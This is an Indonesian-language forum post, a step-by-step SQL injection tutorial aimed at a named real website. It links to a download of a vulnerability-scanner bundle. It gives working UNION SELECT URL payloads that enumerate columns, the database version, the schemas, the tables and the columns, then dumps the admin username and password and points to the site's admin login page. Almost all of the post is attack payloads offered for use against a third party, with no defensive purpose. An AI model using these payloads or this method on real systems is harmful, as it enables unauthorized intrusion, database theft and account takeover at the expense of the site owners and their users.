Nomaden
Nilai Member: +1/-0
Posts: 80
7700.00 Poin
View Inventory
Profesi: Pengangguran aja :D
Usia: 24
Status: Lajang
|
 |
« on: January 27, 2010, 05:59:49 PM » |
|
Lama ga mampir kemari .... iseng" tukar pengalaman aja tentang SQLI .... Mulaiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii,.......................... CARI WEB VULN Pertama" yg perlu dilakukan adalah cari site yg vuln, caranya.. ?? kita udagh ga idup d jaman batu lagi.. udagh banyak tool bertebaran dr sabang ampe new york, tinggal download aja.eke sendiri pake tool scanner dari reiluke, bisa di download di http://rapidshare.com/files/287748108/reiluke_tools.zip password:www.reiluke.i.ph ,itu adalah bundle reiluke tool.Utk saat ini kita akan make "exploit scanner" nya aja dolo, untuk tutorial pemakaian bisa diliat di <![CDATA[<a href="http://www.youtube.com/v/f6SOzynrWx4&rel=0" target="_blank">http://www.youtube.com/v/f6SOzynrWx4&rel=0</a>]]>Nagh.. klo udah dapet site yg vuln .. marilah kita mulai, jangan lupa kopi dan rokok serta doa sebelom melakukannya, biar terhindar dr dosa  eke akan menggunakan contoh site target : http://uaekarobar.com/detail.php?prodid=698tambahkan tanda petik satu di belakang ato di depan angka sehingga menjadi : http://uaekarobar.com/detail.php?prodid=698' atau http://uaekarobar.com/detail.php?prodid='698Nah klo muncul pesen error seperti : -You have an error in your SQL Syntax -Warning: mysql_fetch_array(): -Warning: mysql_fetch_assoc(): -Warning: mysql_numrows(): -Warning: mysql_num_rows(): -Warning: mysql_result(): -Warning: mysql_preg_match(): ato yg laen ... bisa dibilang site target vuln ... dan kita bisa melanjutkan perjuangan kita MENCARI JUMLAH KOLOM selanjutnya kita akan mencari jumlah kolom , kita coba try and error di sini ... dengan memasukkan pertintah "order by" seperti di bawah ini http://uaekarobar.com/detail.php?prodid=698 order by 1-- (ngga error) http://uaekarobar.com/detail.php?prodid=698 order by 100-- (error) http://uaekarobar.com/detail.php?prodid=698 order by 10-- (ngga error) http://uaekarobar.com/detail.php?prodid=698 order by 20-- (ngga error) http://uaekarobar.com/detail.php?prodid=698 order by 30-- (ngga error) http://uaekarobar.com/detail.php?prodid=698 order by 40-- (error) http://uaekarobar.com/detail.php?prodid=698 order by 35-- (error) http://uaekarobar.com/detail.php?prodid=698 order by 34-- (ngga error) berarti kolom nya ada "34" .... *tambahan : tanda -- bisa diganti dgn /* atau /**/ VERSI MYSQL Setelah itu kita akan mencari versi dr sql dengan memakai perintah "union select" http://uaekarobar.com/detail.php?prodid=698 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--berhenti di angka 34 karena jumlah kolom yg ditemukan pada langkah sebelumnya adlah 34,jika ada pesan error seperti "forbidden" atau lainnya berarti web ga support command "union select" dan berhentilah di sini kemudian coba cari target laen, kalau site load dengan normal maka kita bisa melanjutkan usaha kita . Tambahkan tanda minus "-" setelah tanda "=" (sebelum angka 698) sehingga menjadi seperti ini http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--kalau lancar maka akan nampak "visible kolom", pada site target diatas terlihat angka 4,9,10 dan 29 , kita masukkan perintah "version()" pada salah satu visible kolom : http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--dan terlihatlah versi sql yg dipake seperti 5.0.45 atau 4.0.1 dll ..dll ..kalau versi sql nya 4 tinggalin aja karena kita kudu menebak" table dan kolom , kalau versi-nya 5 kita bisa lanjut terussss **tambahan ..perintah "version()" bisa diganti dengan "@@version" kalau muncul error atau ga ada tampilan versi database nya , bisa di convert jadi demikian "convert(@@version using latin1)" MENCARI NAMA DATABASE * Untuk mendapatkan list database pada server http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from+information_schema.schemata--* Untuk mendapatkan nama database yg dipakai saat ini http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--Dan akan didaptkan nama database "prebay" MENCARI NAMA TABLE Setelah nama database kita dapat ... saatnya untuk mencari nama table dalam database tersebut, http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from information_schema.tables where table_schema=database()--dan akan tampil nama table nya yg sangat buanyakkkkk itu ... kek addcoupon,address,admin,adminadress,adverts,banks,banners,category,cj,company_profile...dll.dll copy dolo ke notepad semuanya , biar tar gampang cari data" laen klo dibutuhkan .. *note ... ada table "admin" ..hehehehe makin seru aja kliatannya MENCARI NAMA KOLOM menemukan nama kolom ... use this yakz !! http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from information_schema.columns where table_schema=database()--sama kek mencari table tadi .. akan muncul nama" kolom nya kek... coupon_id,prod_id,cust_id,coupon_code,discount,time_in_use,status,expiry,add_id,cust_email ...dll ..dkk *note ... ada nama kolom "login,password" <----- very usefull inpo negh MENAMPILKAN RECORD DATA Dan ini adalah step final nya ..untuk mengeluarkan (membaca data) http://uaekarobar.com/detail.php?prodid=-698 union select 1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from admin--Keterangan : login dan password didapat dari pencarian kolom admin didapat dari pencarian tabel 0x3a adalah perintah untuk misahin antara record satu dan lainnya hasil yg didapat adalah : admin:admin ... jadi username nya=admin , dan passw=admin LOGIN saat nya buat login cari admin login page nya ..bisa menebak" atau pake bundle tool reiluke yg namanya "admin finder" ... klo dagh dapet halaman nya tinggal login aja dengan data uh kita dapat tadi .... *Tambahan ... pada site target halaman login nya adlh : http://uaekarobar.com/SiteAdmin/loginform.phpSelanjutnya.... Terserah anda ... capeee istirahat dolo ... good luck all |
|
|
|
« Last Edit: January 27, 2010, 06:10:14 PM by hast »
|
|
--Lemparkan seorang yang bahagia dalam bercinta kedalam laut, pasti ia akan
membawa seekor ikan. Lemparkan pula seorang yang gagal dalam bercinta ke dalam gudang roti,pasti ia akan mati kelaparan!--
|
|
|
Pesan ini menandakan bahwa Anda belum bergabung pada komunitas BincangProfesi.com. Silahkan melakukan login bila pernah mendaftar. Atau lakukan registasi bila Anda belum pernah mendaftar di situs ini. Welcome Guest , please login or register to access this forum.